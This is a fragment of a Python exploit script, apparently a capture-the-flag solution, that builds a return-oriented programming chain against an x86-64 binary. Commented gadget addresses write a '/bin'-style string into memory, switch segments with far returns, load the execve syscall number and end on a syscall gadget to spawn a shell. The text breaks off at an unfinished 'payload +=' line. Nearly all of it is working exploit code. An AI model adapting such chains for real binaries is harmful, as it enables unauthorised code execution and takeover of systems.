payload = p64(0x40edcb)
#0x40edcb: pop rax ; retf 2
payload += p64(0x80)+p32(0x4017d3)+p32(0x33)+"\x00"*2
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x4421bf)+p64(0x42c724)
# 0x000000000042c724: stosd dword ptr [rdi], eax; ret; 
payload += p64(0x40edcb)
# 0x40edcb: pop rax ; retf 2
payload += p64(0x6e69622f)+p32(0x4017d3)+p32(0x33)+"\x00"*2
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x442070)+p64(0x42c724)
# 0x000000000042c724: stosd dword ptr [rdi], eax; ret; 
payload += p64(0x40edcb)
# 0x40edcb: pop rax ; retf 2
payload += p64(0x68662f)+p32(0x4017d3)+p32(0x33)+"\x00"*2
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x442074)+p64(0x42c724)
# 0x000000000042c724: stosd dword ptr [rdi], eax; ret; 
payload += p64(0x40edcb)
# 0x40edcb: pop rax ; retf 2
payload += p64(0x36b41fd4)+p32(0x401553)+p32(0x33)+"\x00"*2
# 0x0000000000401553: add edx, dword ptr [rax - 0x366ffe15]; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x442070)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x40edcb)
# 0x40edcb: pop rax ; retf 2
payload += p64(0x3b)+p32(0x40e6ab)+p32(0x33)+"\x00"*2
# 0x000000000040e6ab: syscall; ret; 
payload +=
